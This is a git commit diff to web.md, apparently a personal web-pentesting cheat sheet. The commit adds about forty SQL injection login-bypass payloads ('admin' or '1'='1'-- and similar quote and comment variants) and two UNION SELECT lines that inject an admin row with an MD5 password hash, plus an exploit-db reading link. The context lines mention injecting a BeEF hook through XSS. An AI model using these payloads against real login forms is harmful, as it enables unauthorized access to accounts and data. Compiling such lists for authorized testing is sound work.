Update web.md

mhmh55516 · Apr 18, 2018 · 06cfbb3 · 06cfbb3
1 parent d8b7b40
commit 06cfbb3
Showing 1 changed file with 46 additions and 0 deletions.
diff --git a/web.md b/web.md
@@ -134,6 +134,48 @@ or true--
 ")) or (("x"))=(("x
 '-- -
 '-- -#
+admin' --
+admin' #
+admin'/*
+admin' or '1'='1
+admin' or '1'='1'--
+admin' or '1'='1'#
+admin' or '1'='1'/*
+admin'or 1=1 or ''='
+admin' or 1=1
+admin' or 1=1--
+admin' or 1=1#
+admin' or 1=1/*
+admin') or ('1'='1
+admin') or ('1'='1'--
+admin') or ('1'='1'#
+admin') or ('1'='1'/*
+admin') or '1'='1
+admin') or '1'='1'--
+admin') or '1'='1'#
+admin') or '1'='1'/*
+1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
+admin" --
+admin" #
+admin"/*
+admin" or "1"="1
+admin" or "1"="1"--
+admin" or "1"="1"#
+admin" or "1"="1"/*
+admin"or 1=1 or ""="
+admin" or 1=1
+admin" or 1=1--
+admin" or 1=1#
+admin" or 1=1/*
+admin") or ("1"="1
+admin") or ("1"="1"--
+admin") or ("1"="1"#
+admin") or ("1"="1"/*
+admin") or "1"="1
+admin") or "1"="1"--
+admin") or "1"="1"#
+admin") or "1"="1"/*
+1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
 ```
 ##### SQLi
 Check if you can find a row, where you can place your output
@@ -179,4 +221,8 @@ Or to use Beef just inject the hook into a XSS after starting it up
 ```
 
 More reading
+
+https://www.exploit-db.com/papers/13646/
+
 http://brutelogic.com.br/blog/probing-to-find-xss/
+